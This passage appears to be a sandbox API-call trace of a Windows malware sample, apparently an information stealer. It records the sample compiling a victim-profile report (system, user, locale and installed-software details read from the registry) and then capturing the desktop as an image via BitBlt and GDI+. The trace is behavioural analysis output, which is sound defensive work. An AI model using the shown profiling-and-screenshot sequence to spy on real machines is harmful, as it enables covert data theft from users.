States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005" [0208.119] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="12.0.21005", lpcbData=0x19ce18*=0xb) returned 0x0 [0208.119] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 " [0208.119] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 ", lpString2="12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005" [0208.120] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005\n" [0208.120] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.120] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x2c, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0208.120] RegCloseKey (hKey=0x3a8) returned 0x0 [0208.120] lstrlenA (lpString="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005\n") returned 1844 [0208.120] _mbsicmp (_Str1=0x19d4be, _Str2=0x416c4c) returned -1 [0208.120] _mbsicmp (_Str1=0x19d4be, _Str2=0x416c50) returned -1 [0208.120] _mbsicmp (_Str1=0x19d4be, _Str2=0x416c58) returned -1 [0208.120] _mbsicmp (_Str1=0x19d4be, _Str2=0x416c60) returned 1 [0208.120] _mbsicmp (_Str1=0x19d4be, _Str2=0x416c68) returned 1 [0208.120] _mbsicmp (_Str1=0x19d4be, _Str2=0x416c70) returned 1 [0208.120] _mbsicmp (_Str1=0x19d4be, _Str2=0x416c78) returned 1 [0208.120] _mbsicmp (_Str1=0x19d4be, _Str2=0x416c7c) returned 1 [0208.120] GetLocalTime (in: lpSystemTime=0x19d080 | out: lpSystemTime=0x19d080*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x1, wDay=0xd, wHour=0x10, wMinute=0x6, wSecond=0x39, wMilliseconds=0x3cc)) [0208.120] SystemTimeToFileTime (in: lpSystemTime=0x19d080, lpFileTime=0x19d098 | out: lpFileTime=0x19d098) returned 1 [0208.120] FileTimeToSystemTime (in: lpFileTime=0x19d06c, lpSystemTime=0x19d054 | out: lpSystemTime=0x19d054) returned 1 [0208.123] GetTickCount () returned 0x20877ce [0208.123] GetDesktopWindow () returned 0x10010 [0208.123] srand (_Seed=0x20977de) [0208.123] rand () returned 25979 [0208.123] rand () returned 5558 [0208.123] rand () returned 14336 [0208.123] rand () returned 12315 [0208.123] rand () returned 786 [0208.124] rand () returned 4039 [0208.124] rand () returned 29322 [0208.124] rand () returned 8849 [0208.124] rand () returned 28859 [0208.124] rand () returned 30191 [0208.124] rand () returned 14321 [0208.124] rand () returned 23293 [0208.124] GetProcessHeap () returned 0x5b0000 [0208.124] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6afa8) returned 0x636ec0 [0208.174] GetProcessHeap () returned 0x5b0000 [0208.175] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x617cf8 [0208.175] GetProcessHeap () returned 0x5b0000 [0208.175] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x360) returned 0x632870 [0208.189] GdiplusStartup (in: token=0x19d630, input=0x19d61c, output=0x0 | out: token=0x19d630, output=0x0) returned 0x0 [0208.275] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x19d62c | out: ppstm=0x19d62c*=0x61fbb8) returned 0x0 [0208.277] GetDesktopWindow () returned 0x10010 [0208.277] GetWindowRect (in: hWnd=0x10010, lpRect=0x19d600 | out: lpRect=0x19d600) returned 1 [0208.277] GetDC (hWnd=0x10010) returned 0xa0100d0 [0208.278] CreateCompatibleDC (hdc=0xa0100d0) returned 0x480106ef [0208.278] CreateCompatibleBitmap (hdc=0xa0100d0, cx=1440, cy=900) returned 0x3c0506c3 [0209.079] SelectObject (hdc=0x480106ef, h=0x3c0506c3) returned 0x185000f [0209.080] BitBlt (hdc=0x480106ef, x=0, y=0, cx=1440, cy=900, hdcSrc=0xa0100d0, x1=0, y1=0, rop=0xcc0020) returned 1 [0209.469] GdipCreateBitmapFromHBITMAP (hbm=0x3c0506c3, hpal=0x0, bitmap=0x19d5f8) returned 0x0 [0210.020] GdipGetImageEncodersSize (numEncoders=0x19d5cc, size=0x19d5c8) returned 0x0 [0210.022] GetProcessHeap () returned 0x5b0000 [0210.022] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x410) returned 0x6337c0 [0210.022] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x6337c0 | out: encoders=0x6337c0) returned 0x0 [0210.022] GdipSaveImageToStream (image=0x9161f08, stream=0x61fbb8, clsidEncoder=0x19d5e4*(Data1=0x557cf401, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0210.924] GetHGlobalFromStream (in: pstm=0x61fbb8, phglobal=0x19d5f4 | out: phglobal=0x19d5f4) returned 0x0 [0210.924] GlobalLock (hMem=0x9170004) returned 0x9cf0048 [0210.924] GlobalSize (hMem=0x9170004) returned 0x1c396 [0210.924] _mbsicmp (_Str1=0x19d466, _Str2=0x416c4c) returned -1 [0210.924] _mbsicmp (_Str1=0x19d466, 